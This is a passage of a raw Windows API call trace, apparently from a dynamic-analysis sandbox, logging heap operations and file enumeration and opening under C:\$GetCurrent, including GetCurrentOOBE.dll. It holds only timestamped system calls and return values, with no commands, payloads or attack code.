InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0059.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0059.665] AreFileApisANSI () returned 1 [0059.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0059.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46a58 [0059.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=51 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 51 [0059.665] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0059.667] GetFileType (hFile=0x424) returned 0x1 [0059.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0059.667] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0059.667] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0059.667] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0059.667] CloseHandle (hObject=0x424) returned 1 [0059.668] AreFileApisANSI () returned 1 [0059.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0059.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46908 [0059.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=51 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 51 [0059.668] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0059.668] GetFileType (hFile=0x424) returned 0x1 [0059.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0059.668] CloseHandle (hObject=0x424) returned 1 [0059.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0059.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0059.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0059.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0059.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0059.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0059.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0059.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0059.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0059.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0059.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0059.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0059.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0059.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0059.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535f8 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0059.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535f8 | out: hHeap=0x20000) returned 1 [0059.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535f8 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535f8 | out: hHeap=0x20000) returned 1 [0059.669] AreFileApisANSI () returned 1 [0059.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0059.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46978 [0059.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46978, cchWideChar=51 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned 51 [0059.669] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28)) returned 1 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0059.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0059.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.669] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x64, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x76118, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x64, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="te", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓(")) returned 0 [0059.804] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0059.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0059.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0059.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0059.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0059.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0059.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0059.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76d90 | out: hHeap=0x20000) returned 1 [0059.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0059.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0059.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0059.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0059.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0059.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0059.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0059.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0059.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0059.832] AreFileApisANSI () returned 1 [0059.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 22 [0059.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0059.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0059.835] AreFileApisANSI () returned 1 [0059.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0059.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0059.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x4e228, cchWideChar=22 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS") returned 22 [0059.835] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS" (normalized: "c:\\$getcurrent\\safeos"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.835] GetLastError () returned 0x5 [0059.836] GetLastError () returned 0x5 [0059.836] SetLastError (dwErrCode=0x5) [0059.836] GetLastError () returned 0x5 [0059.836] SetLastError (dwErrCode=0x5) [0059.836] GetLastError () returned 0x5 [0059.836] SetLastError (dwErrCode=0x5) [0059.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0059.847] AreFileApisANSI () returned 1 [0059.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0059.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de70 [0059.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x4de70, cchWideChar=22 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS") returned 22 [0059.847] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS" (normalized: "c:\\$getcurrent\\safeos"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.847] GetLastError () returned 0x5 [0059.847] GetLastError () returned 0x5 [0059.847] SetLastError (dwErrCode=0x5) [0059.847] GetLastError () returned 0x5 [0059.847] SetLastError (dwErrCode=0x5) [0059.847] GetLastError () returned 0x5 [0059.847] SetLastError (dwErrCode=0x5) [0059.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0059.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0059.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0059.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0059.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0059.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0059.847] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x2a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x78f18, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x2a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="")) returned 0 [0059.847] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0059.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0059.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0059.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0059.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0059.873] FindFirstFileExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0059.877] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.877] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0059.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0059.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0059.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0059.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0059.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76d90 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0059.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0059.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0059.878] AreFileApisANSI () returned 1 [0059.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll", lpUsedDefaultChar=0x0) returned 41 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0059.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0059.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0059.879] AreFileApisANSI () returned 1 [0059.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0059.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67660 [0059.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=41 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 41 [0059.879] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0059.881] GetFileType (hFile=0x410) returned 0x1 [0059.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0059.881] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0059.881] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0059.881] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0059.881] CloseHandle (hObject=0x410) returned 1 [0059.882] AreFileApisANSI () returned 1 [0059.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0059.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0059.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 41 [0059.882] CreateFileW 